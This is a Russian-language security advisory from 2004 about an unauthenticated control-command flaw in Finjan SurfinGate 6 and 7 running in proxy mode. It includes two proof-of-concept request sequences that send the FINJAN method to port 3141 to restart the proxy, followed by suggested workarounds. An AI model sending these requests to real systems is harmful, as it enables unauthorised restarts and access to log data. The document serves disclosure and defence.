Security Lab

Неавторизованное выполнение управляющих команд в SurfinGate

Дата публикации:27.01.2004
Всего просмотров:1264
Опасность:
Средняя
Наличие исправления: Инстуркции по устранению
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Локальная сеть
Воздействие: Обход ограничений безопасности
Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Finjan SurfinGate 6.x
Finjan SurfinGate 7.x
Уязвимые версии: SurfinGate 6, 7 (as of January 22, 2004)

Описание: Уязвимость обнаружена в SurfinGate. Удаленный пользователь может выполнить некоторые управляющие команды на приложении, когда приложение запущено в proxy режиме.

Удаленный пользователь может подключиться к управляющему порту (3141) и использовать команды, чтобы просмотреть данные регистрации и перезапустить прокси службу. Для выполнения этих команд не требуется авторизация на сервере. Уязвимые команды включают 'finjan-parameter-type', 'restart', 'getlastmsg', 'online', и 'strings'.

Пример/Эксплоит:

Example 1:
          >>> CONNECT LOCALHOST:3141 HTTP/1.0
          >>>

          <<< HTTP/1.0 200 Connection established
          <<< Proxy-agent: Finjan-SurfinGate/6.0
          <<<

          >>> FINJAN /stam HTTP/1.0
          >>> finjan-version: fhttp/1.0
          >>> finjan-command: custom
          >>> finjan-parameter-category: console
          >>> finjan-parameter-type: restart
          >>> content-length: 0
          >>>

          <<< HTTP/1.0 200 OK
          <<< finjan-version: fhttp/1.0
          <<<
          <<<


     Example 2:
          >>> FINJAN localhost:3141/stam HTTP/1.0
          >>> finjan-version: fhttp/1.0
          >>> finjan-command: custom
          >>> finjan-parameter-category: console
          >>> finjan-parameter-type: restart
          >>> content-length: 0
          >>>

          <<< HTTP/1.0 200 OK
          <<< finjan-version: fhttp/1.0
          <<<
          <<<

URL производителя: http://www.finjan.com/products/surfingate.cfm

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. Используйте следующее временное решение проблемы:

"* Use a proxy server between the user and SurfinGate server to block CONNECT commands to ports other than 443 AND block non-standard HTTP commands (i.e. FINJAN ).

* Inside the SurfinGate policy, add URL rules to block all access to any hostname or IP address that would connect to the FHTTP port. This can be a long list; localhost, 127.0.0.1, the hostname, loghost for Solaris machines, the IP address SurfinGate binds to, any DNS entries, etc.

* Change the control port to something besides 3141. This is pretty weak, but better than nothing."
Ссылки: Finjan SurfinGate Vulnerability